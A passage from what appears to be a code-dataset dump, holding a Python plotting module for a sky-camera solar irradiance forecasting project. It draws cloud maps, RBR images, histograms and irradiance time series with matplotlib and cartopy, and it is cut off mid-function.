"attribute"}, {"api_name": "tkinter.END", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1234, "usage_type": "attribute"}, {"api_name": "spacy.tokens.tokens", "line_number": 1249, "usage_type": "attribute"}, {"api_name": "spacy.tokens", "line_number": 1249, "usage_type": "name"}, {"api_name": "tkinter.filedialog.asksaveasfile", "line_number": 1263, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 1263, "usage_type": "name"}, {"api_name": "tkinter.END", "line_number": 1302, "usage_type": "attribute"}, {"api_name": "tkinter.Toplevel", "line_number": 1347, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 1348, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 1349, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 1350, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 1351, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 1352, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 1353, "usage_type": "attribute"}]} +{"seq_id": "23621036636", "text": "# Import MatplotLib for visualization\nimport 
matplotlib.pyplot as plt\nimport time\nfrom datetime import datetime\nimport cv2\nimport os\nimport numpy as np\nfrom skysol.lib import optical_flow, misc, drawings\nfrom numpy import degrees, radians, arctan2, pi\nfrom matplotlib.dates import date2num, DateFormatter, DayLocator, HourLocator, MinuteLocator\nfrom matplotlib.ticker import MaxNLocator, LinearLocator\nfrom scipy.ndimage.interpolation import rotate\nfrom PIL import Image\nimport cmocean\n\n#===============================================================================\n#\n# Matplotlib settings\n#\n#===============================================================================\nplt.rcParams['ytick.labelsize'] = 11.\nplt.rcParams['xtick.labelsize'] = 11.\nplt.rcParams['axes.labelcolor'] = '000000'\nplt.rcParams['axes.linewidth'] = 2\nplt.rcParams['axes.labelsize'] = 12.\nplt.rcParams['axes.unicode_minus'] = False\nplt.rcParams['axes.facecolor'] = 'ffffff'\nplt.rcParams['xtick.major.size' ] = 5.5 # major tick size in points\nplt.rcParams['xtick.minor.size' ] = 3.5 # minor tick size in points\nplt.rcParams['ytick.major.size' ] = 5.5 # major tick size in points\nplt.rcParams['ytick.minor.size' ] = 3.5 # minor tick size in points\nplt.rcParams['ytick.major.width' ] = 2 # major tick width in points\nplt.rcParams['xtick.major.width' ] = 2 # major tick width in points\nplt.rcParams['ytick.color'] = '000000'\nplt.rcParams['xtick.color'] = '000000'\nplt.rcParams['grid.color'] = 'black' # grid color\nplt.rcParams['grid.linestyle'] = ':' # dotted\nplt.rcParams['grid.linewidth'] = 0.2 # in points\nplt.rcParams['font.size'] = 11.\nplt.rcParams['axes.titlesize'] = 'large'\nplt.rcParams['legend.fontsize'] = 'small'\nplt.rc('mathtext', fontset='cm', default='regular')\n\ndef patch_image_cache(style, cache_dir='tilecache'):\n \"\"\"\n Monkey patch the ``get_image()`` method of ``tiles`` to read and write image\n tiles from ``cache_dir`` before trying to download them.\n \"\"\"\n from cartopy.io.img_tiles import GoogleTiles\n\n tiles = GoogleTiles(style=style)\n # Ensure cache directory exists.\n os.makedirs(cache_dir, exist_ok=True)\n def get_image(tile):\n cache_img = os.path.join(cache_dir, style + '_%d_%d_%d.png' % tile )\n if os.path.exists(cache_img):\n img = Image.open(cache_img).convert(tiles.desired_tile_form)\n return img, tiles.tileextent(tile), 'lower'\n # Call get_image() method of tiles instance and store the downloaded image.\n img, extent, origin = type(tiles).get_image(tiles, tile)\n img.save(cache_img, 'PNG')\n return img, extent, origin\n tiles.get_image = get_image\n return tiles\n\ndef fill_between(x, y1, y2=0, ax=None, **kwargs):\n \"\"\"Plot filled region between `y1` and `y2`.\n\n This function works exactly the same as matplotlib's fill_between, except\n that it also plots a proxy artist (specifically, a rectangle of 0 size)\n so that it can be added to a legend.\n \"\"\"\n ax = ax if ax is not None else plt.gca()\n ax.fill_between(x, y1, y2, **kwargs)\n p = plt.Rectangle((0, 0), 0, 0)#, **kwargs)\n ax.add_patch(p)\n return p\n\n\n\ndef scale_bar(ax, lat, lon, length, location=(0.5, 0.05), linewidth=5):\n \"\"\"\n ax is the axes to draw the scalebar on.\n location is the center of the scalebar in axis coordinates, i.e. 
0.5 is the middle of the plot\n length is the length of the scalebar in km.\n linewidth is the thickness of the scalebar.\n \"\"\"\n import utm\n import cartopy.crs as ccrs\n #Projection in metres, need to change this to suit your own figure\n zone = utm.latlon_to_zone_number(lat,lon)\n if lat < 0:\n sh = True\n else:\n sh = False\n utm_c = ccrs.UTM(zone, southern_hemisphere=sh)\n #Get the extent of the plotted area in coordinates in metres\n x0, x1, y0, y1 = ax.get_extent(utm_c)\n #Turn the specified scalebar location into coordinates in metres\n sbcx, sbcy = x0 + (x1 - x0) * location[0], y0 + (y1 - y0) * location[1]\n #Generate the x coordinate for the ends of the scalebar\n for i in range(0,length):\n if i % 2 == 0:\n c = 'k'\n else:\n c = 'w'\n bar_xs = [sbcx - length * 500 + i * 1000, sbcx - length * 500 + (i+1) * 1000]\n #Plot the scalebar\n ax.plot(bar_xs, [sbcy, sbcy], transform=utm_c, color=c, linewidth=linewidth)\n #Plot the scalebar label\n sbcy = sbcy + (y1 - y0) * 0.02\n ax.text(sbcx, sbcy, str(length) + ' km', color=\"black\", transform=utm_c, fontweight=\"bold\",\n horizontalalignment='center', verticalalignment='bottom', fontsize=15)\n\n\n\ndef plot(outfile, in_img, actdate, nstations, pyr, csk, ini,cmv, \\\n xsun, ysun, mask, csl, cmap, features, hist_flag=False, text_flag=False,\n params=None):\n\n fig = plt.figure(figsize=(16,9))\n\n ncols = 5; nrows = 3\n\n # get station index\n if ini.fcst_flag and nstations > 0:\n k = [j for j in range(0, nstations) if int(pyr[j].ind) == int(ini.statlist[0])][0]\n else:\n k = 0\n\n # Cloud classification\n if ini.cloud_class_apply:\n CC_long = ['Cumulus','Cirrus','Altocumulus','Clear Sky','Stratocumulus', 'Stratus', 'Nimbostratus']\n CC_short = ['Cu','Ci/Cs','Ac/Cc','Clear','Sc', 'St', 'Ns/Cb']\n ccstr_long = CC_long[params['imgclass']-1]\n ccstr_short = CC_short[params['imgclass']-1]\n if params['imgclass'] > 0:\n cpstr = str(np.round(params['imgprob'][params['imgclass']-1],2))\n else:\n cpstr = \"-1\"\n else:\n ccstr_long = \"\"\n ccstr_short = \"\"\n cpstr = \"\"\n\n img = cmap.copy()\n\n if ini.cbh_flag:\n\n from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\n #-------------------------------------------------------------------\n # create map\n #-------------------------------------------------------------------\n\n style = \"satellite\"\n # load OSM background image\n background = patch_image_cache(style, \\\n ini.rootdir + '/tmp')\n\n ax = plt.subplot2grid((nrows,ncols), (0,2), \\\n colspan=2, rowspan=2, projection=background.crs)\n\n # set boundaries of map\n ax.set_extent((ini.lon_min, ini.lon_max, ini.lat_min, ini.lat_max ))\n bnd = ax.get_extent()\n\n # Add the background to the map\n res = ini.x_res * ini.grid_size\n if res > 10000:\n ax.add_image(background,12,alpha=0.9)\n elif res > 5000 and res <= 10000:\n ax.add_image(background,13,alpha=0.9)\n else:\n ax.add_image(background,14,alpha=0.9)\n\n #ax.imshow(background)\n gl = ax.gridlines(draw_labels=True,\n linewidth=1, color='white', alpha=0.6, linestyle='--')\n gl.xlabels_top = gl.ylabels_right = False\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlabel_style = {'size': 10, 'color': 'black'}\n gl.ylabel_style = {'size': 10, 'color': 'black'}\n\n # draw cloud/shadow map\n ax.imshow(img,cmap=plt.cm.gray,alpha=0.5, \\\n zorder=1, vmin=0, transform=background.crs, origin=\"upper\",\\\n extent=bnd)\n\n # Draw a scale bar\n scale_bar(ax, ini.lat0, ini.lon0, 5, linewidth=10)\n
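\n # Usage sketch (illustrative only, not a project API guarantee): scale_bar(ax, ini.lat0, ini.lon0, 5) draws a 5 km bar as alternating 1 km black/white segments, projected in the local UTM zone, at the default axes position (0.5, 0.05).\n\n # Mark camera position\n sct = 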
ax.scatter(ini.lon0, ini.lat0, \\\n s=25, marker='x',c=\"red\", transform=background.crs.as_geodetic())\n\n else:\n\n # draw cloud map\n ax = plt.subplot2grid((nrows,ncols), (0,2), colspan=2, rowspan=2)\n sct = ax.imshow(img, vmin=0, cmap=plt.cm.get_cmap('RdBu_r'))\n ax.grid('off')\n plt.title('Irradiance Map')\n plt.axis('off')\n\n\n # Forecast arrow\n if ini.flow_flag:\n\n # Point forecast\n xvals = []; yvals = []; vals = []\n cm = plt.cm.get_cmap('RdBu_r')\n cm = cmocean.cm.solar\n # Draw forecast arrow\n if ini.draw_forecast_path:\n for i in range(0, ini.fcst_horizon):\n inind = int(i / ini.fcst_res)\n x = int(pyr[k].fpos[i][1])\n y = int(pyr[k].fpos[i][0])\n if x > cmap.shape[0] - 2 or x <= 0 or y <= 0 or y > cmap.shape[1]-2: continue\n xvals.append(x); yvals.append(y)\n cskval = csk.ghi[csk.tind]\n vals.append(pyr[k].fghi[inind])\n\n if ini.cbh_flag:\n xvals = np.array(xvals)[np.isfinite(vals)]\n yvals = np.array(yvals)[np.isfinite(vals)]\n vals = np.array(vals)[np.isfinite(vals)]\n lats, lons = misc.grid2latlon(ini.lat0,ini.lon0,ini.x_res, ini.y_res, ini.grid_size, xvals, yvals)\n if len(xvals) > 0:\n sct = ax.scatter(lons, lats, s=30, vmin=0.15 * cskval,\n vmax=cskval + 0.15 * cskval, marker='o', c=vals, cmap=cm, \\\n edgecolor='none', transform=background.crs.as_geodetic(),zorder=10)\n # Draw station dots\n sct2 = plot_stat(ax, ini, nstations, pyr, csk.ghi[csk.tind], k,\n transform=background.crs.as_geodetic())\n else:\n\n sct = ax.scatter(xvals, yvals, s=30, vmin=0.15 * csk.ghi[csk.tind],\n vmax=csk.ghi[csk.tind] + 0.15 * csk.ghi[csk.tind], marker='o', c=vals, cmap=cm,\n edgecolor='none')\n\n # Colorbar\n try:\n cbar = plt.colorbar(mappable=sct, pad=.02, aspect=18, shrink=0.85)\n except ( AttributeError, TypeError, UnboundLocalError ):\n pass\n\n # Select area to cut from image\n imgsize = in_img.orig_color.shape\n x0 = int(ini.cy-ini.fx)\n if x0 < 0: x0 = 0\n x1 = int(ini.cy+ini.fx)\n if x1 > imgsize[0]: x1 = imgsize[0]\n y0 = int(ini.cx-ini.fy)\n if y0 < 0: y0 = 0\n y1 = int(ini.cx+ini.fy)\n if y1 > imgsize[1]: y1 = imgsize[1]\n\n\n # Origin Image\n plt.subplot2grid((nrows,ncols), (0,0), colspan=1, rowspan=1)\n img = in_img.orig_color_draw.copy()\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n #img = rotate(img[x0:x1,y0:y1],-np.degrees(ini.rot_angles[2]))\n cv2.circle(img,(ysun,xsun),15,0,-1)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n plt.imshow(img)\n plt.title('Original Image')\n del img\n\n # RBR\n ax = plt.subplot2grid((nrows,ncols), (1,1))\n img = in_img.rbr.copy() * 1.0\n img[mask] = np.nan\n img = img[x0:x1,y0:y1]\n a = ax.imshow(img,vmin=ini.rbr_thres-0.2, vmax=ini.rbr_thres+0.2,cmap=plt.cm.viridis)\n cbar = plt.colorbar(a,pad=.03,aspect=15,shrink=0.7, format=\"%.2f\" )\n plt.axis('off')\n if csl == 0: plt.title('RBR')\n if csl == 1: plt.title('RBR - CSL')\n if csl == 2: plt.title('RBR corrected')\n\n\n\n if hist_flag:\n\n in_img.rbr[mask]=np.nan\n plt.subplot2grid((nrows,ncols), (2,0),colspan=1)\n plt.hist((in_img.rbr.flatten()), \\\n range=(0.3,1.3), bins=125, color=\"red\",alpha=0.5,normed=True)\n plt.ylim(0,15)\n plt.axvline(ini.rbr_thres, color='b', linestyle='dashed', linewidth=2)\n plt.legend(['RBR threshold','RBR'],loc=2)\n\n if ini.csi_mode == \"hist\" and ini.radiation:\n ind = pyr[k].tind\n y = np.divide( pyr[k].ghi[ind-ini.avg_csiminmax:ind], csk.ghi[csk.tind-ini.avg_csiminmax:csk.tind] )\n y = y[np.isfinite(y)]\n if len(y) > (0.6*ini.avg_csiminmax):\n ax = plt.subplot2grid((nrows,ncols), (2,1),colspan=1)\n plt.hist((y),bins=ini.hist_bins, 
color=\"red\",range=(0.0,1.5))\n plt.axvline(pyr[k].csi_min, color='b', linestyle='dashed', linewidth=2)\n plt.axvline(pyr[k].csi_max, color='b', linestyle='dashed', linewidth=2)\n plt.xlim(0.2,1.5)\n ax.text(0.2,1.05,'k* histogram',fontsize=9,transform=ax.transAxes)\n\n # Clear Sky Reference\n if csl == 1:\n plt.subplot2grid((nrows,ncols), (1,0))\n img = in_img.cslimage\n img[mask] = np.nan\n img = img[x0:x1,y0:y1]\n a = plt.imshow(img,vmin=0.5, vmax=1.2,cmap=plt.cm.viridis)\n plt.title('CSL')\n plt.axis('off')\n plt.colorbar(a,pad=.03, aspect=15,shrink=0.7)\n\n if ini.plot_features:\n\n for f in range(0,len(features.vec)):\n if f > len(features.vec)/2:\n xo = 0.7; yo = 0.3-(f-len(features.vec)/2)/50.\n else:\n xo = 0.43; yo = 0.3-f/50.\n txt = '%g' % (features.vec[f])\n fig.text(xo,yo,features.names[f][0:26])\n fig.text(xo+0.17,yo,txt)\n\n # RBR differences\n# img = in_img.rbr_orig - in_img.rbr\n# plt.subplot2grid((nrows,ncols), (1,0))\n# img[mask] = np.nan\n# a = plt.imshow(img[x0:x1,y0:y1],cmap=plt.cm.get_cmap('bwr'),vmin=-0.2,vmax=0.2)\n# plt.axis('off')\n# plt.colorbar(a,pad=.03, aspect=15,shrink=0.7)\n# plt.title('RBR diff')\n\n # Binary cloud mask\n plt.subplot2grid((nrows,ncols), (0,1))\n img = in_img.binary_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img[in_img.mask_horizon] = 0\n img = img[x0:x1,y0:y1]\n #img = rotate(img,np.degrees(ini.rot_angles[2]))\n plt.title('Cloud decision')\n plt.axis('off')\n plt.imshow(img)\n\n\n\n # Draw timeseries\n past = ini.plot_last_vals\n horizon = int(ini.fcst_horizon/ini.fcst_res) + 1\n horizon = int(ini.fcst_horizon)\n if hist_flag:\n ax = plt.subplot2grid((nrows,ncols), (2,2),colspan=3)\n elif ini.plot_features:\n ax = plt.subplot2grid((nrows,ncols), (2,0),colspan=2)\n else:\n ax = plt.subplot2grid((nrows,ncols), (2,0),colspan=5)\n\n maxval = 0\n\n i = 0\n\n if ini.radiation:\n\n # Plot measurements\n if ini.live:\n slc = slice(pyr[k].tind-past,pyr[k].tind,ini.fcst_res)\n x = pyr[k].time[slc]\n y = pyr[k].ghi[slc]\n y2 = pyr[k].dhi[slc]\n else:\n slc = slice(pyr[k].tind-past,pyr[k].tind+horizon,ini.fcst_res)\n x = pyr[k].time[slc]\n y = pyr[k].ghi[slc]\n y2 = pyr[k].dhi[slc]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n if len(dates) > 0: plt.plot(dates, y, 'b-',lw=2.0, label=\"Measurement\")\n if len(y2) > 0:\n fill_between(dates,0,y2,alpha=0.5,linewidth=0,facecolor=\"yellow\", label=\"DHI\")\n fill_between(dates,y2,y,alpha=0.5,linewidth=0,facecolor=\"orange\", label=\"DNI\")\n\n # Analysis Values\n nvals = ini.plot_last_vals / ini.camera_res / ini.rate\n x = pyr[k].aghi_time[-int(nvals):]\n dates=[datetime.utcfromtimestamp(ts) for ts in x if ~np.isnan(ts) ]\n if len(dates) > 0:\n y = pyr[k].aghi[-len(dates):]\n plt.plot(dates, y, 'gv', label=\"Analysis\")\n\n # Clear sky irradiance\n slc = slice(csk.tind-ini.plot_last_vals, csk.tind+ini.fcst_horizon, ini.fcst_res)\n x = csk.time[slc]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n y = csk.ghi[slc]\n plt.plot(dates, y, '--', color='black', label=\"Clear Sky\")\n maxval = 1.7 * csk.actval\n plt.ylabel('Irradiance in $Wm^{-2}$')\n\n # Forecast Values\n x = pyr[k].ftime\n dates=[ datetime.utcfromtimestamp(ts) for ts in x if ~np.isnan(ts) ]\n y = pyr[k].fghi[:len(dates)]\n\n plt.plot(dates,y,'r-',lw=2.0, label=\"Forecast\")\n\n # Vertical line to plot current time instance\n plt.axvline(actdate, color='b', linestyle='--', lw=2.0)\n plt.xlabel('Time [UTC]')\n plt.legend(loc=\"upper left\", ncol=3, fontsize=8)\n plt.ylim([0,maxval])\n\n 
ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n ax.xaxis.set_major_locator(LinearLocator(numticks=6))\n ax.xaxis_date()\n\n # Draw Text\n ax = plt.subplot2grid((nrows,ncols), (0,4),rowspan=2)\n ax.axis('off')\n nowtime = datetime.strftime(datetime.utcnow(),\"%Y-%m-%d %H:%M:%S\")\n acttime = datetime.strftime(actdate,\"%Y-%m-%d %H:%M:%S\")\n loctime = str(in_img.locdate.isoformat(' '))\n ax.text(-0.3,0.95,acttime + str(' UTC'), weight=\"bold\")\n ax.text(0.2,0.02,'Created:\\n' + nowtime + str(' UTC'),fontsize=9)\n ax.text(-0.3,0.9,\"Sun Zenith = \" + str(round(params['sza'],1)) + '$^\circ$' )\n ax.text(-0.3,0.86,\"Sun Azimuth = \" + str(round(params['saz'],1)) + '$^\circ$' )\n if ini.cbh_flag: ax.text(-0.3,0.82,'Cloud Base Height: ' + \\\n str(int(params['cbh'])) + ' m ')\n ax.text(-0.3,0.79,'Cloud Type: ' + ccstr_long + ' ' + ccstr_short + ' ' + cpstr)\n ax.text(-0.3,0.72,'Radiation measurements \\n' + params['txt'] + ':' )\n ax.text(-0.3,0.65,\"GHI = \" + str(round(params['ghi'],1)) + ' $W/m^2$ (' + str(round(params['csi_ghi'],2))+')' )\n ax.text(-0.3,0.61,\"DHI = \" + str(round(params['dhi'],1)) + ' $W/m^2$ (' + str(round(params['csi_dhi'],2))+')' )\n ax.text(-0.3,0.57,\"DNI = \" + str(round(params['dni'],1)) + ' $W/m^2$ (' + str(round(params['csi_dni'],2))+')' )\n\n if ini.mode <= 1:\n ax.text(-0.3,0.40,'Cloud Cover = ' + str(round(params['cc'],1)) + ' %' )\n\n\n if ini.flow_flag:\n if ini.cbh_flag:\n unit = \"m/s\"\n else:\n unit = \"pix/s\"\n ax.text(-0.3, 0.34, '#CMV = ' + str(np.sum(cmv.flag)))\n um = cmv.speed[-1]; vm = cmv.direction[-1]\n ume = cmv.sspeed[-1]; vme = cmv.sdirection[-1]\n ax.text(-0.3,0.30,'All speed = ' + str(round(um,2)) + '$\pm$' + str(round(ume,2)) + unit)\n ax.text(-0.3,0.26,'All direction = ' + str(round(np.degrees(vm),2)) + '$\pm$' + str(round(np.degrees(vme),2)) +'$^\circ$')\n um = cmv.mean_speed; vm = cmv.mean_direction\n ume = cmv.std_speed; vme = cmv.std_direction\n ax.text(-0.3,0.22,'Global speed = ' + str(round(um,2)) + '$\pm$' + str(round(ume,2)) + unit)\n ax.text(-0.3,0.18,'Global direction = ' + str(round(np.degrees(vm),2)) + '$\pm$' + str(round(np.degrees(vme),2)) +'$^\circ$')\n\n ax.text(-0.3,0.14,'Lens Clear = ' + str(params['img_qc']))\n if in_img.useful_image:\n qc = \"OK\"\n else:\n qc = \"BAD\"\n ax.text(-0.3,0.10,'Quality Flag = ' + qc)\n\n\n # Final settings\n fig.set_figwidth(16.)\n fig.set_figheight(9.)\n fig.set_dpi(50.)\n fig.subplots_adjust(hspace=0.15,wspace=0.4,left=0.05, right=0.97, top=0.95, bottom=0.08)\n plt.savefig(outfile,format=ini.outformat)\n plt.clf()\n plt.close('all')\n\n\n\n\n\ndef plot_stat(ax, ini, nstations, pyr, cskval, k, transform=None):\n cm = plt.cm.get_cmap('RdBu_r')\n cm = cmocean.cm.solar\n xsct = []; ysct = []; val = []; flag = []; isdata = []\n # collect data from single stations\n for i in range(0, nstations):\n x = float(pyr[i].map_y)\n y = float(pyr[i].map_x)\n z = np.nanmean(pyr[i].ghi[pyr[i].tind-ini.rate:pyr[i].tind])\n xsct.append(x)\n ysct.append(y)\n val.append(z)\n if np.isfinite(z):\n isdata.append(True)\n flag.append(pyr[i].qflag[pyr[i].tind])\n else:\n isdata.append(False)\n flag.append(-1)\n isdata = np.array(isdata)\n xsct = np.array(xsct)\n ysct = np.array(ysct)\n val = np.array(val)\n # geographical coordinates\n if transform is not None:\n if np.sum(isdata) == 0:\n lats, lons = misc.grid2latlon(ini.lat0,ini.lon0,ini.x_res, ini.y_res, \\\n ini.grid_size, xsct, ysct)\n sct = ax.scatter(lons, lats, \\\n s=25, marker='x',c=\"red\", transform=transform)\n else:
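\n # Assumed semantics (read from the call signature below): misc.grid2latlon maps grid row/column positions around the camera origin (ini.lat0, ini.lon0) to latitude/longitude, scaled by the x/y pixel resolution and the grid size.\n lats, lons = 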
misc.grid2latlon(ini.lat0,ini.lon0,ini.x_res, ini.y_res, \\\n ini.grid_size, np.array(xsct), np.array(ysct))\n sct = ax.scatter(lons[isdata], lats[isdata], s=25, marker='x', vmin=0.15 * cskval, \\\n vmax=cskval + 0.15 * cskval, c=val[isdata], cmap=cm, edgecolor='none', \\\n transform=transform, zorder=30)\n else:\n # Use grid coordinates\n sct = ax.scatter(xsct[k], ysct[k], s=25, marker='o', vmin=0.15 * cskval, \\\n vmax=cskval + 0.15 * cskval, c=val[k], cmap=cm, edgecolor='none')\n\n return sct\n\n\ndef plot_detection_full(outfile, ini, in_img, mask, **params):\n\n ncols = 5; nrows = 2\n textsize=19\n\n # Select area to cut from image\n imgsize = in_img.orig_color.shape\n x0 = int(ini.cy-ini.fx)\n if x0 < 0: x0 = 0\n x1 = int(ini.cy+ini.fx)\n if x1 > imgsize[0]: x1 = imgsize[0]\n y0 = int(ini.cx-ini.fy)\n if y0 < 0: y0 = 0\n y1 = int(ini.cx+ini.fy)\n if y1 > imgsize[1]: y1 = imgsize[1]\n\n\n fig = plt.figure(figsize=(15,6))\n\n\n # Original Image\n ax = plt.subplot2grid((nrows,ncols), (0,0))\n img = in_img.orig_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.text(0.03,0.85,'a)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.imshow(img)\n\n\n # Pixel Intensity\n ax = plt.subplot2grid((nrows,ncols), (1,0))\n img = 1.0 * in_img.orig_gray.copy()\n img[mask] = np.nan\n img = img[x0:x1,y0:y1]\n a = plt.imshow(img, vmin=0, vmax=255, cmap=plt.cm.viridis)\n cb = plt.colorbar(a,shrink=0.7,aspect=15)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n ax.text(0.03,0.9,'b)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.axis('off')\n\n\n # CSL Image\n ax = plt.subplot2grid((nrows,ncols), (0,1))\n try:\n img = in_img.cslimage\n img[mask] = np.nan\n a = plt.imshow(img[x0:x1,y0:y1],vmin=0.5, vmax=1.2, cmap=plt.cm.viridis)\n ax.text(0.03,0.9,'c)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.axis('off')\n cb = plt.colorbar(a,shrink=0.7,aspect=15)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n except AttributeError:\n pass\n\n # RBR Original\n ax = plt.subplot2grid((nrows,ncols), (0,2))\n img = in_img.rbr_orig\n img[mask] = np.nan\n a = plt.imshow(img[x0:x1,y0:y1],vmin=0.5, vmax=1.2, cmap=plt.cm.viridis)\n ax.text(0.03,0.9,'e)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.axis('off')\n cb = plt.colorbar(a,pad=.03, aspect=15,shrink=0.7)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n\n # RBR diff\n img = in_img.rbr_orig - in_img.rbr\n ax = plt.subplot2grid((nrows,ncols), (1,1))\n img[mask] = np.nan\n a = plt.imshow(img[x0:x1,y0:y1],cmap=plt.cm.get_cmap('bwr'),vmin=-0.5,vmax=0.5)\n plt.axis('off')\n ax.text(0.03,0.9,'d)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n cb = plt.colorbar(a,pad=.03, aspect=15,shrink=0.7)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n\n\n\n # RBR modified\n ax = plt.subplot2grid((nrows,ncols), (1,2))\n img = in_img.rbr.copy() * 1.0\n img[mask] = np.nan\n img = img[x0:x1,y0:y1]\n a = ax.imshow(img,vmin=ini.rbr_thres-0.2, vmax=ini.rbr_thres+0.2, cmap=plt.cm.viridis)\n cb = plt.colorbar(a,pad=.03,aspect=15,shrink=0.7)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n ax.text(0.03,0.9,'f)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.axis('off')\n\n # Cloud map original\n sky_bool = in_img.rbr_orig <= ini.rbr_thres\n cloud_bool = in_img.rbr_orig > 
ini.rbr_thres\n binary_color = in_img.orig_color.copy()\n binary_color[sky_bool, :] = [ 255, 0 , 0 ]\n binary_color[cloud_bool, :] = [ 255, 255 , 255 ]\n binary_color[mask, :] = 0 # mask\n\n ax = plt.subplot2grid((nrows,ncols), (0,3))\n img = binary_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.imshow(img)\n ax.text(0.03,0.85,'g)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n\n # Cloud map corrected\n ax = plt.subplot2grid((nrows,ncols), (1,3))\n img = in_img.binary_color.copy()\n #cloud_bool = (img != [0,0,0]) & (img != [255,0,0])\n #img[cloud_bool] = 255\n #if ini.mask_sun: img[in_img.sun_mask] = 0\n #if ini.dyn_horizon: img[in_img.sun_mask] = 0\n img[mask] = 0\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.imshow(img)\n ax.text(0.03,0.85,'h)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n # Histogram\n ax = plt.subplot2grid((nrows,ncols), (0,4))\n in_img.rbr_orig[mask] = np.nan\n ax.hist(( in_img.rbr_orig.flatten()) , range=(0.0,1.1), bins=256, normed=True, color=\"blue\")\n ax.set_ylim(0,15)\n plt.axvline(ini.rbr_thres, color='b', linestyle='dashed', linewidth=2)\n ax.text(0.03,0.85,'i)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n\n ax = plt.subplot2grid((nrows,ncols), (1,4))\n in_img.rbr[mask] = np.nan\n plt.hist((in_img.rbr.flatten()), range=(0.0,1.1), bins=256, color=\"blue\",normed=True)\n plt.ylim(0,15)\n plt.axvline(ini.rbr_thres, color='b', linestyle='dashed', linewidth=2)\n ax.text(0.03,0.85,'j)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n\n # Final settings\n fig.subplots_adjust(hspace=0.1,wspace=0.2,left=0.01, right=0.99, top=0.99, bottom=0.05)\n plt.savefig(outfile,format=ini.outformat)\n plt.clf()\n\n\n\ndef plot_detection(outfile, ini, in_img):\n \"\"\" Plot only raw image and binary decision \"\"\"\n ncols = 2; nrows = 1\n textsize=19\n\n # Select area to cut from image\n imgsize = in_img.orig_color.shape\n x0 = int(ini.cy-ini.fx)\n if x0 < 0: x0 = 0\n x1 = int(ini.cy+ini.fx)\n if x1 > imgsize[0]: x1 = imgsize[0]\n y0 = int(ini.cx-ini.fy)\n if y0 < 0: y0 = 0\n y1 = int(ini.cx+ini.fy)\n if y1 > imgsize[1]: y1 = imgsize[1]\n\n fig = plt.figure(figsize=(6,3))\n\n # Original Image\n ax = plt.subplot2grid((nrows,ncols), (0,0))\n img = in_img.orig_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.text(0.03,0.85,'a)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n ax.imshow(img)\n\n\n # Cloud map\n ax = plt.subplot2grid((nrows,ncols), (0,1))\n img = in_img.binary_color.copy()\n cloud_bool = (img != [0,0,0]) & (img != [255,0,0])\n img[cloud_bool] = 255\n #if ini.mask_sun: img[in_img.sun_mask] = 0\n #if ini.dyn_horizon: img[in_img.sun_mask] = 0\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.imshow(img)\n ax.text(0.03,0.85,'b)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n # Final settings\n fig.subplots_adjust(hspace=0.1,wspace=0.2,left=0.01, right=0.99, top=0.99, bottom=0.05)\n plt.savefig(outfile,format=ini.outformat)\n plt.clf()\n\n\n\ndef plot_paper_juelich(outfile,in_img,actdate,nstations,pyr,csk,ini,cmv, \\\n xsun,ysun, mask,csl,\\\n cmap,features,hist_flag=False,text_flag=False,**params):\n\n plt.close('all')
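\n\n # Crop-window arithmetic (illustrative numbers, not from any config): the x0/x1, y0/y1 bounds computed below clamp the slice [cy-fx:cy+fx, cx-fy:cx+fy] to the frame, e.g. cy=960, fx=900 on a 1920-row image gives rows 60:1860.\n fig = plt.figure(1,figsize=(9,9),facecolor='w', 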
